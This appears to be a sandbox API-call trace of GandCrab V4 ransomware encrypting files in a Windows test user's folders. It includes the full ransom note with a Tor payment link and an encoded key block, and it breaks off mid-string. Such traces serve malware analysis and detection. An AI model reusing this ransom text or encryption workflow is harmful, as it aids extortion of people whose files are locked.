lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\KRAB-DECRYPT.txt") returned 48 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0092.978] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0092.978] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.979] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.979] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0092.979] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0092.979] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links" [0092.979] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\" [0092.979] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0092.979] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.980] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.980] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.980] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.980] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.980] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.980] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\\\KRAB-DECRYPT.txt") returned 55 [0092.980] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\links\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.983] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0092.983] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0092.985] CloseHandle (hObject=0x434) returned 1 [0092.985] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.985] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.986] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0xb6)) [0092.986] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.986] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.987] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a08d2ca4dee3d.lock") returned 61 [0092.987] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\links\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0092.987] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.988] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.988] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\") returned 38 [0092.988] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\*" [0092.988] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd560 [0092.988] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.988] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0092.988] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.988] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.988] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0092.989] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0092.989] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0092.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a08d2ca4dee3d.lock" [0092.989] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.001] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 66 [0093.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a08d2ca4dee3d.lock") returned 61 [0093.001] lstrlenW (lpString=".lock") returned 5 [0093.001] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.001] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.002] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.003] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.003] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.003] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0093.003] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0093.003] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini" [0093.003] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.003] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini.KRAB") returned 54 [0093.004] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0093.004] lstrlenW (lpString=".ini") returned 4 [0093.004] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.004] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0093.005] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0093.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0093.005] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0093.005] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.005] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.005] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.005] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.005] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\KRAB-DECRYPT.txt" [0093.006] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.006] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\KRAB-DECRYPT.txt.KRAB") returned 59 [0093.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\KRAB-DECRYPT.txt") returned 54 [0093.006] lstrlenW (lpString=".txt") returned 4 [0093.006] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.006] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.006] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.008] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\KRAB-DECRYPT.txt") returned 54 [0093.008] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\KRAB-DECRYPT.txt") returned 54 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.008] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.008] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.008] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0093.009] FindClose (in: hFindFile=0xfbd560 | out: hFindFile=0xfbd560) returned 1 [0093.009] CloseHandle (hObject=0x434) returned 1 [0093.009] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0093.009] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0093.009] CloseHandle (hObject=0x320) returned 1 [0093.009] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0093.009] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.009] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\KRAB-DECRYPT.txt" [0093.011] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.011] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\KRAB-DECRYPT.txt.KRAB") returned 43 [0093.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\KRAB-DECRYPT.txt") returned 38 [0093.012] lstrlenW (lpString=".txt") returned 4 [0093.012] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.012] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.012] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\KRAB-DECRYPT.txt") returned 38 [0093.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\KRAB-DECRYPT.txt") returned 38 [0093.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.016] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.016] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.016] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.016] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.016] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.017] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.017] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0093.017] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0093.017] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0093.017] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Links" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links") returned="C:\\Users\\CIiHmnxMn6Ps\\Links" [0093.017] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\" [0093.017] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.017] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.017] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.017] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.018] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.018] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.018] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.018] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\\\KRAB-DECRYPT.txt") returned 45 [0093.018] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Links\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\links\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0093.050] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7